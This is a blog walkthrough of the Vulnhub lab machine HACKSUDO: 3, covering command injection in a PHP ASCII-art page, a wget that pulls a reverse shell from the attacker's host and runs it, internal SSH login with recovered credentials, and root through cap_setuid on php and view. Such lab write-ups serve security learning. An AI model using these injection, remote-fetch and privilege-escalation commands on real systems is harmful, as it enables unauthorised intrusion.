---
layout: post
title:  "Vulnhub: HACKSUDO: 3"
date:   2021-04-15 22:00:00 +1100
category: hacking
---

## HACKSUDO: 3
This is [HACKSUDO: 3](https://www.vulnhub.com/entry/hacksudo-3,671/) from Vulnhub. It says:

>This box should be easy . This machine was created for the InfoSec Prep Discord Server (https://discord.gg/tsEQqDJh), and  
>Find the user.txt and root.txt flag submit it to the mybox channel on Discord and get chance to get hacksudo machine hacking course free 

I don't normally post these anywhere but hey, maybe I will this time.

## Ports
LOL. The first time I scanned this I *only* had a web port (HTTP on 80). After I completed it I scanned it again and SSH was open. Whaaaaaat? I don't think I opened it; maybe I was too quick on the scan. Whatever, we start with web.

## HTTP/80
The website has a few things on it; it mostly presents as a copy of a github project but some enumeration reveals javascript files related to games and a few PHP files including *info.php*, *login.php* and *generator.php*. We don't have any credentials so I ignore login.php; I run a bunch of *feroxbuster* scans but I don't find anything interesting.

## generator.php
This is a page that allows you to enter a name, which it then renders in ASCII art. Neat. It is also command injectable; eg:

``
name && id
``

Which produces:

>'name' as ASCII art, and  
uid=33(www-data) gid=33(www-data) groups=33(www-data)

I try a few one-liner reverse shells but I can't get one to fire. I try using echo to write a file on the webserver; the file gets created but it's empty. I try with printf; same thing. Next I try using curl and wget to retrieve a shell from my box, eg (this is from Burp Suite):

``
ip=id && wget http://192.168.1.192:9090/cmd.php -O /var/www/html/cmd.php&submit=submit
``

This will create the file, but it's empty, so no bueno. I try again but placing the file in the /tmp directory; still empty. I try /dev/shm - success! The sequence is:

Upload the file (this was just a bash reverse shell):

``
ip=id && wget http://192.168.1.192:9090/shell.sh -O /dev/shm/shell.sh 
``

Now make it executable:

``
ip=id && chmod  x /dev/shm/shell.sh&submit=submit
``

And now call it:

``
ip=id && /dev/shm/shell.sh&submit=submit
``

And in my listener:

{% highlight shell %}
┌──(root💀kali)-[/opt/vulnhub/hacksudo3]
└─# nc -nvlp 1234                                                                       
listening on [any] 1234 ...
connect to [192.168.1.192] from (UNKNOWN) [192.168.1.201] 40924
bash: cannot set terminal process group (735): Inappropriate ioctl for device
bash: no job control in this shell
www-data@hacksudo:/var/www/html$
{% endhighlight %}

## hacksudo
I have a look in the webserver; turns out my *feroxbuster* searches found most of the content. I check *login.php* and find this line:

>you have logged in successfully , 0x Open The Next Door key is  =   GMYTGMBTGAZTAMZRGIYDGMJTGAZTAMZQGMZDEMBTGEZTAMZQGMYDGMY=  

But even now I've rooted the box I'm still not sure what that means.

One level up in /var/www, we find this:

{% highlight shell %}
www-data@hacksudo:/var/www$ ls -alsh
ls -alsh
total 16K
4.0K drwxr-xr-x  3 www-data www-data 4.0K Apr 15 12:13 .
4.0K drwxr-xr-x 14 root     root     4.0K Mar 19 07:57 ..
   0 -rw-r--r--  1 www-data www-data    0 Apr 15 12:13 .wget-hsts
4.0K -rwxrwxr--  1 www-data www-data  176 Mar 20 11:31 hacksudo
4.0K drwxr-xr-x  6 www-data www-data 4.0K Apr 15 12:18 html
www-data@hacksudo:/var/www$ file hacksudo
file hacksudo
hacksudo: ASCII text
{% endhighlight %}

I won't reproduce it here, but we have a ROT13 encoded file, which contains SSH credentials for hacksudo (the password is hashed, but John deals with it).

But, we had no open SSH port? What about internally? Yes. I couldn't get it to work with the normal commands but using IPv6 it was ok, not sure if that was intentional or not.

{% highlight shell %}
www-data@hacksudo:/var/www$ ssh -6 hacksudo@localhost
ssh -6 hacksudo@localhost
Could not create directory '/var/www/.ssh'.
The authenticity of host 'localhost (::1)' can't be established.
ECDSA key fingerprint is SHA256:DQGgjBAkTgrLHL8x9i2t/g6vbx0ASKgtWdGRHLbrXrU.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
yes
Failed to add the host to the list of known hosts (/var/www/.ssh/known_hosts).
hacksudo@localhost's password: vishal

Welcome to Ubuntu 20.10 (GNU/Linux 5.8.0-45-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu Apr 15 12:24:32 PM UTC 2021

  System load:  0.0               Processes:               120
  Usage of /:   94.9% of 6.82GB   Users logged in:         0
  Memory usage: 41%               IPv4 address for enp0s3: 192.168.1.201
  Swap usage:   0%

  => / is using 94.9% of 6.82GB

 * Introducing self-healing high availability clusters in MicroK8s.
   Simple, hardened, Kubernetes for production, from RaspberryPi to DC.

     https://microk8s.io/high-availability

45 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Wed Mar 24 09:02:25 2021 from 192.168.0.7
hacksudo@hacksudo:~$ sudo -l
sudo -l
[sudo] password for hacksudo: vishal

Sorry, user hacksudo may not run sudo on hacksudo.
{% endhighlight %}

## root
There are multiple ways of escalating to root on this box and I know that because after I'd done this, I watched a YouTube video of someone else doing the box and he used the LXD privesc which was much more complicated than what I did.

Linpeas points this out:

{% highlight shell %}
Files with capabilities:
/home/hacksudo/locker/php cap_setuid=ep
/home/hacksudo/locker/php cap_setuid=ep is writable
{% endhighlight %}

And [GTFOBins](https://gtfobins.github.io/gtfobins/php/#capabilities) lights the way:

{% highlight shell %}
hacksudo@hacksudo:~/locker$ CMD="/bin/sh"
CMD="/bin/sh"
hacksudo@hacksudo:~/locker$ ./php -r "posix_setuid(0); system('$CMD');"
./php -r "posix_setuid(0); system('$CMD');"
id;hostname;date
uid=0(root) gid=1000(hacksudo) groups=1000(hacksudo),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)
hacksudo
Thu Apr 15 12:32:37 PM UTC 2021
cat root.txt
7db64dc8077ff8f969938bc48bd0a9ab
cat proof.txt
you successfully rooted hacksudo3 box !!!
{% endhighlight %}

Cool.

Since I knew there was at least one other method for getting root, I went to look to see if I could find *another* one. I noticed linpeas pointed out that *view* also had the cap_setuid capability. Would that work - we have a method at [GTFObins](https://gtfobins.github.io/gtfobins/view/#capabilities)?

Yes, it does work - with a slight modification. Note; there are several different *view* binaries on the box. We want this one:

>/home/hacksudo/view cap_setuid=ep

Trying it directly (more or less) from GTFObins:

``
hacksudo@hacksudo:~$ ./view -c ':py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'
``

provokes this error:

>reset: unknown terminal type unknown

In order to fix this, I changed a few things. Firstly, SSH with *-t* (this may not have been necessary):

``
www-data@hacksudo:/var/www/html$ ssh -6 -t hacksudo@localhost
``

Next, check (and then set) TERM:

{% highlight shell %}
hacksudo@hacksudo:~$ echo $TERM
echo $TERM
dumb
hacksudo@hacksudo:~$ export TERM=xterm-256color
export TERM=xterm-256color
hacksudo@hacksudo:~$ echo $TERM
echo $TERM
xterm-256color
{% endhighlight %}

And finally:

``
hacksudo@hacksudo:~$ ./view -c ':python3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'
``

Boom.

{% highlight shell %}
# id;hostname;date
id;hostname;date
uid=0(root) gid=1000(hacksudo) groups=1000(hacksudo),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)
hacksudo
Thu Apr 15 01:21:40 PM UTC 2021
{% endhighlight %}

So; two ways to root and both different to the video I watched.
